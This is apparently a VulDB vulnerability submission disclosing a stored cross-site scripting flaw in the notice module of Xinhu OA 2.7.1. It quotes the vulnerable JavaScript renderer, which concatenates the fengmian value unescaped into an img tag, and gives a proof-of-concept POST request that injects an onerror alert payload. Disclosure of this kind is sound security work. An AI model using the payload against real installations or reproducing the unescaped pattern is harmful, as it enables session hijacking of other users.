| 제목 | Xinhu Xinhu OA V2.7.1 (earlier versions may also be affected) Stored Cross-Site Scripting (XSS) |
|---|
| 설명 | Xinhu OA V2.7.1 is vulnerable to a Stored Cross-Site Scripting (XSS) vulnerability within the "Notice and Announcement" (通知公告) module. The vulnerability exists in the rock_page_gong.php file, where the fengmian (cover image) parameter accepts user-supplied input without any security filtering or sanitization.
An attacker can inject a malicious XSS payload into a notice. When other users view the reminder information in the "Personal Center" (个人中心), the payload is executed in the user's browser. This could lead to session hijacking, unauthorized actions, or the execution of malicious code.
Advisory / Exploit
Vulnerability Point: Notice and Announcement - Add New Notice Trigger Point: Personal Center - Reminder Information - View
Vulnerable Code Snippet (rock_page_gong.php):
JavaScript
c.setcolumns('fengmian',{
renderer:function(v){
if(!v)return ' ';
// The variable 'v' is directly concatenated into the HTML string
return '<img src="'+v+'" height="60">';
}
});
Proof of Concept (POC): An attacker can submit the following POST request with a malicious payload in the fengmian parameter:
HTTP
POST /index.php?a=save&m=mode_news|input&d=flow&ajaxbool=true&rnd=98122 HTTP/1.1
Host: [Target_Host]
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Cookie:
id=0&sxuanfileid=151&title=test&fengmian="x onerror="alert(1)"&typename=Security&...
The injected onerror event triggers the JavaScript execution when the image fails to load.
Company official website URL: http://www.rockoa.com/
Source code download address:http://www.rockoa.com/index.php?a=down&id=298 |
|---|
| 사용자 | BlackSpdier (UID 89912) |
|---|
| 제출 | 2025. 12. 28. AM 11:05 (4 개월 ago) |
|---|
| 모더레이션 | 2026. 01. 04. PM 06:56 (7 days later) |
|---|
| 상태 | 수락 |
|---|
| VulDB 항목 | 339493 [Xinhu Rainrock RockOA 까지 2.7.1 Cover Image rock_page_gong.php fengmian 크로스 사이트 스크립팅] |
|---|
| 포인트들 | 17 |
|---|